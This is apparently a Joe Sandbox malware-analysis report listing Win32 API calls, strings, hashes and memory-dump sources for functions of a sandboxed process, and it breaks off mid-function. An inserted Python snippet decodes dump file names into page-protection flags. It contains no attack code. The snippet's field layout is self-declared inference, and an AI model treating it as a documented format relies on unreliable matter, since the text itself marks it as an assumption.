                          • Instruction ID: 2bdba640aa2ce85ed9475a981bfc790e981900120c5157fc32e665a8f14dc4cb
                          • Opcode Fuzzy Hash: 36ca81ec0bd1979f69d1ffc4241cdc1e182b57a91160cc26f69f321af25696d7
                          • Instruction Fuzzy Hash: 15317C31A44209AADA24EB50DD53EFE7BE4AF20744F3005E6F561B10E5FFA1AF04C655
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadIconW.USER32(00000063), ref: 00B3F8AB
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B3F8BD
                          • SetWindowTextW.USER32(?,?), ref: 00B3F8D4
                          • GetDlgItem.USER32(?,000003EA), ref: 00B3F8E9
                          • SetWindowTextW.USER32(00000000,?), ref: 00B3F8EF
                          • GetDlgItem.USER32(?,000003E9), ref: 00B3F8FF
                          • SetWindowTextW.USER32(00000000,?), ref: 00B3F905
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B3F926
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B3F940
                          • GetWindowRect.USER32(?,?), ref: 00B3F949
                          • SetWindowTextW.USER32(?,?), ref: 00B3F9B4
                          • GetDesktopWindow.USER32 ref: 00B3F9BA
                          • GetWindowRect.USER32(00000000), ref: 00B3F9C1
                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B3FA0D
                          • GetClientRect.USER32(?,?), ref: 00B3FA1A
                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B3FA3F
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B3FA6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: dba881ee4f254ff0a0d286f32e17f0a4fc25ed30ea85bbd4689dfdec8fb8f0e3
                          • Instruction ID: b585b787a0add89e9a1c9504a24fbf9d4c1a081c6873151eb20482bdbce38b74
                          • Opcode Fuzzy Hash: dba881ee4f254ff0a0d286f32e17f0a4fc25ed30ea85bbd4689dfdec8fb8f0e3
                          • Instruction Fuzzy Hash: 5F51287190070AEFDB209FA8CD89F6EBBF5FF04704F104A69E596A35A0DB74A944CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B6CD0B
                          • DestroyWindow.USER32(00000000,?), ref: 00B6CD83
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B6CE04
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B6CE26
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B6CE35
                          • DestroyWindow.USER32(?), ref: 00B6CE52
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B00000,00000000), ref: 00B6CE85
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B6CEA4
                          • GetDesktopWindow.USER32 ref: 00B6CEB9
                          • GetWindowRect.USER32(00000000), ref: 00B6CEC0
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B6CED2
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B6CEEA
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                          • String ID: 0$tooltips_class32
                          • API String ID: 1297703922-3619404913
                          • Opcode ID: 0e1bd181380e9ac02233dc836c8cb77c9ced84ecd4fad8955cc25eed25670617
                          • Instruction ID: 67f6cfffad9f3d63ac069cc4f634481c332d6858bd57d7d696c65ee28217d1d9
                          • Opcode Fuzzy Hash: 0e1bd181380e9ac02233dc836c8cb77c9ced84ecd4fad8955cc25eed25670617
                          • Instruction Fuzzy Hash: EB71A8B1144309AFE720CF68CC85FBA7BF5EB89704F440959F989A72A1DB75E801CB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00B4B46D
                          • VariantCopy.OLEAUT32(?,?), ref: 00B4B476
                          • VariantClear.OLEAUT32(?), ref: 00B4B482
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B4B561
                          • __swprintf.LIBCMT ref: 00B4B591
                          • VarR8FromDec.OLEAUT32(?,?), ref: 00B4B5BD
                          • VariantInit.OLEAUT32(?), ref: 00B4B63F
                          • SysFreeString.OLEAUT32(00000016), ref: 00B4B6D1
                          • VariantClear.OLEAUT32(?), ref: 00B4B727
                          • VariantClear.OLEAUT32(?), ref: 00B4B736
                          • VariantInit.OLEAUT32(00000000), ref: 00B4B772
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 3730832054-3931177956
                          • Opcode ID: 6b52aa7adaa4cf2418ee267fe1441d5b6f8395013207e92985ef1bec7ec9abe9
                          • Instruction ID: 348c1a441c90509c8d604adde8581a589b1ff3cecc14a8e58432c43537e501d3
                          • Opcode Fuzzy Hash: 6b52aa7adaa4cf2418ee267fe1441d5b6f8395013207e92985ef1bec7ec9abe9
                          • Instruction Fuzzy Hash: 3CC1DF31A00615EBCB109F65D8C5F6AB7F5FF05300F1484E5E6059B6A2CB74EE50EBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B6E3BB
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B69615,?), ref: 00B6E417
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6E457
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6E49C
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6E4D3
                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00B69615,?), ref: 00B6E4DF
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B6E4EF
                          • DestroyCursor.USER32(?), ref: 00B6E4FE
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B6E51B
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B6E527
                            • Part of subcall function 00B21BC7: __wcsicmp_l.LIBCMT ref: 00B21C50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          • API String ID: 3907162815-1154884017
                          • Opcode ID: 94a00a970e6b569c1e2d4de111325c54942a783746bde63370df1e112591f270
                          • Instruction ID: e3827936d2a6f70e21f3417f0ad17398d154a660a30d9142560ba30108d6965b
                          • Opcode Fuzzy Hash: 94a00a970e6b569c1e2d4de111325c54942a783746bde63370df1e112591f270
                          • Instruction Fuzzy Hash: 95618D71500215BAEB249B64DC86BAE7BE8EB18710F104696F925EB1D1DB78D980C760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 00B50EFF
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50F0F
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B50F1B
                          • __wsplitpath.LIBCMT ref: 00B50F79
                          • _wcscat.LIBCMT ref: 00B50F91
                          • _wcscat.LIBCMT ref: 00B50FA3
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B50FB8
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B50FCC
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B50FFE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B5101F
                          • _wcscpy.LIBCMT ref: 00B5102B
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B5106A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                          • String ID: *.*
                          • API String ID: 3566783562-438819550
                          • Opcode ID: aaf16479bd5a6818aff731183756f1f33f7db36ddb9110f96c1fa25f2e546d96
                          • Instruction ID: b2f76cd7642eba7e4ada28e4767e3a0166909abd20acbe22457a9d7155e93321
                          • Opcode Fuzzy Hash: aaf16479bd5a6818aff731183756f1f33f7db36ddb9110f96c1fa25f2e546d96
                          • Instruction Fuzzy Hash: A3616E725043459FC710EF64C845A9FB7E8FF89310F04899AF98997291EB31EA49CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • CharLowerBuffW.USER32(?,?), ref: 00B4DB26
                          • GetDriveTypeW.KERNEL32 ref: 00B4DB73
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4DBBB
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4DBF2
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4DC20
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 2698844021-4113822522
                          • Opcode ID: e1b965f6fe30f44dfc7c4c1e94115b68c16b20d433d618580a14a43f9fcf3cd5
                          • Instruction ID: e74d7996cefb66770e6a86046dba06f347c9bace6dd938d8825447086f936387
                          • Opcode Fuzzy Hash: e1b965f6fe30f44dfc7c4c1e94115b68c16b20d433d618580a14a43f9fcf3cd5
                          • Instruction Fuzzy Hash: 22516C71504305AFC700EF10C8919AAB7E9FF98B58F5088ACF896972A1DB71EE05CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B74085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00B43145
                          • LoadStringW.USER32(00000000,?,00B74085,00000016), ref: 00B4314E
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00B74085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00B43170
                          • LoadStringW.USER32(00000000,?,00B74085,00000016), ref: 00B43173
                          • __swprintf.LIBCMT ref: 00B431B3
                          • __swprintf.LIBCMT ref: 00B431C5
                          • _wprintf.LIBCMT ref: 00B4326C
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B43283
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 984253442-2268648507
                          • Opcode ID: 8fd254277a952b189b18d74127f741a3b60ec6045bf8085c997e084e9393975a
                          • Instruction ID: 5a11aa82feb38af3906852b902e5b50306045a56ea5796bfb10386a82a417c3c
                          • Opcode Fuzzy Hash: 8fd254277a952b189b18d74127f741a3b60ec6045bf8085c997e084e9393975a
                          • Instruction Fuzzy Hash: 40411171900219BADB14FB90DD96EEFBBF8AF14B01F1404A5B206B20E1DE656F04DA61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00B4D96C
                          • __swprintf.LIBCMT ref: 00B4D98E
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B4D9CB
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B4D9F0
                          • _memset.LIBCMT ref: 00B4DA0F
                          • _wcsncpy.LIBCMT ref: 00B4DA4B
                          • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00B4DA80
                          • CloseHandle.KERNEL32(00000000), ref: 00B4DA8B
                          • RemoveDirectoryW.KERNEL32(?), ref: 00B4DA94
                          • CloseHandle.KERNEL32(00000000), ref: 00B4DA9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          • API String ID: 2733774712-3457252023
                          • Opcode ID: 300b7541768c29aea10774402ec43d022265501a3f4a62089f2eae3a9cab8a78
                          • Instruction ID: ab699327803ad4cad3ca740e4d9859bf54bae4b17df259351757412e075fe61c
                          • Opcode Fuzzy Hash: 300b7541768c29aea10774402ec43d022265501a3f4a62089f2eae3a9cab8a78
                          • Instruction Fuzzy Hash: D5319671500218AADB20EFA4DC89FDA77FCEF84710F1085E6F519D21A0EB709B41DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                          • String ID:
                          • API String ID: 884005220-0
                          • Opcode ID: 80eb4aa0b448bc772b1dca84f801e13b970c245e918537b8b493455612432563
                          • Instruction ID: b4d5b68fc96b3ecd33540ea4fecc941af449af67365aa68fa89a31f1658a09a9
                          • Opcode Fuzzy Hash: 80eb4aa0b448bc772b1dca84f801e13b970c245e918537b8b493455612432563
                          • Instruction Fuzzy Hash: 9161F372916211EFEB25AF38EC42B6977E4EF05321F3401A5F805EB2D1DBB5DD408AA4
                          Uniqueness

                          Uniqueness Score: -1.00%
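
Every function entry on this page lists the same eight memory dumps under "Memory Dump Source". As an added example (not part of the Joe Sandbox report and not Joe Sandbox's own parser), the Python below decodes the part of those dump names that can be checked against the page: the fourth field lines up with the "Offset: 00B00000" image base, the fifth field only ever holds values that are exactly the Win32 PAGE_* protection constants (0x02, 0x04, 0x40, 0x80), and the seventh field is 0x01000000, which is MEM_IMAGE. That field layout is an inference from these names, is marked as such in the code, and the remaining fields are left uninterpreted. The practical point is which image regions are mapped writable and executable, since that is where in-place unpacked code ends up and the "Source File" for every entry here is the 0x40 region at 00B01000.

```python
import re
from dataclasses import dataclass
from typing import List

# Win32 page-protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITABLE_EXECUTABLE = {0x40, 0x80}
# Win32 memory-type constants (winnt.h).
MEM_TYPE = {0x01000000: "MEM_IMAGE", 0x00040000: "MEM_MAPPED", 0x00020000: "MEM_PRIVATE"}

# ASSUMED field layout of a dump name: eight dot-separated hex fields before
# ".sdmp". Field 3 is read as the region base (it matches the "Offset: 00B00000"
# image base on this page), field 4 as the protection (the page shows only
# 0x02, 0x04, 0x40 and 0x80 there, all valid PAGE_* values) and field 6 as the
# memory type (0x01000000 = MEM_IMAGE). The other fields are kept raw.
DUMP_NAME = re.compile(r"^(?P<fields>(?:[0-9A-Fa-f]+\.){7}[0-9A-Fa-f]+)\.sdmp$")


@dataclass(frozen=True)
class DumpRegion:
    address: int
    protect: str
    mem_type: str
    raw_fields: tuple


def parse_dump_name(name: str) -> DumpRegion:
    """Decode one Joe Sandbox dump file name under the assumed layout above."""
    m = DUMP_NAME.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    fields = tuple(m.group("fields").split("."))
    protect = int(fields[4], 16)
    mem_type = int(fields[6], 16)
    return DumpRegion(
        address=int(fields[3], 16),
        protect=PAGE_PROTECT.get(protect, f"0x{protect:X}"),
        mem_type=MEM_TYPE.get(mem_type, f"0x{mem_type:X}"),
        raw_fields=fields,
    )


def writable_executable(names: List[str]) -> List[int]:
    """Base addresses of regions whose protection allows both writing and execution."""
    out = []
    for name in names:
        region = parse_dump_name(name)
        if int(region.raw_fields[4], 16) in WRITABLE_EXECUTABLE:
            out.append(region.address)
    return sorted(out)


# The eight dump names listed under "Memory Dump Source" for this process (copied from the report).
SAMPLE_DUMPS = [
    "00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for dump in SAMPLE_DUMPS:
        r = parse_dump_name(dump)
        print(f"{r.address:08X} {r.protect:<24} {r.mem_type}")
    print("writable+executable:", [hex(a) for a in writable_executable(SAMPLE_DUMPS)])
```

Run against the names on this page, only the PE header at 00B00000 is read-only and only the last region at 00C84000 is plain read/write; every code region in between is PAGE_EXECUTE_READWRITE, which is what an image that was unpacked in place looks like.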

                          APIs
                          • __wsplitpath.LIBCMT ref: 00B50C93
                          • _wcscat.LIBCMT ref: 00B50CAB
                          • _wcscat.LIBCMT ref: 00B50CBD
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B50CD2
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B50CE6
                          • GetFileAttributesW.KERNEL32(?), ref: 00B50CFE
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B50D18
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B50D2A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                          • String ID: *.*
                          • API String ID: 34673085-438819550
                          • Opcode ID: 6f30cc101568fdc3ac1a82002d35465434f1bac36dcd7d3f6cbe483f40db29aa
                          • Instruction ID: 4e3946780434b56f3c9af72631c6df5522c104a7fd9c3a87325cb3fb0cf11932
                          • Opcode Fuzzy Hash: 6f30cc101568fdc3ac1a82002d35465434f1bac36dcd7d3f6cbe483f40db29aa
                          • Instruction Fuzzy Hash: 2A8193715143059FC764EF64C884BAEB7E4EB89311F1489EAFC85C7251EB34E988CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B3B903
                            • Part of subcall function 00B3B8E7: GetLastError.KERNEL32(?,00B3B3CB,?,?,?), ref: 00B3B90D
                            • Part of subcall function 00B3B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00B3B3CB,?,?,?), ref: 00B3B91C
                            • Part of subcall function 00B3B8E7: RtlAllocateHeap.NTDLL(00000000,?,00B3B3CB), ref: 00B3B923
                            • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B3B93A
                            • Part of subcall function 00B3B982: GetProcessHeap.KERNEL32(00000008,00B3B3E1,00000000,00000000,?,00B3B3E1,?), ref: 00B3B98E
                            • Part of subcall function 00B3B982: RtlAllocateHeap.NTDLL(00000000,?,00B3B3E1), ref: 00B3B995
                            • Part of subcall function 00B3B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B3B3E1,?), ref: 00B3B9A6
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B3B5F7
                          • _memset.LIBCMT ref: 00B3B60C
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3B62B
                          • GetLengthSid.ADVAPI32(?), ref: 00B3B63C
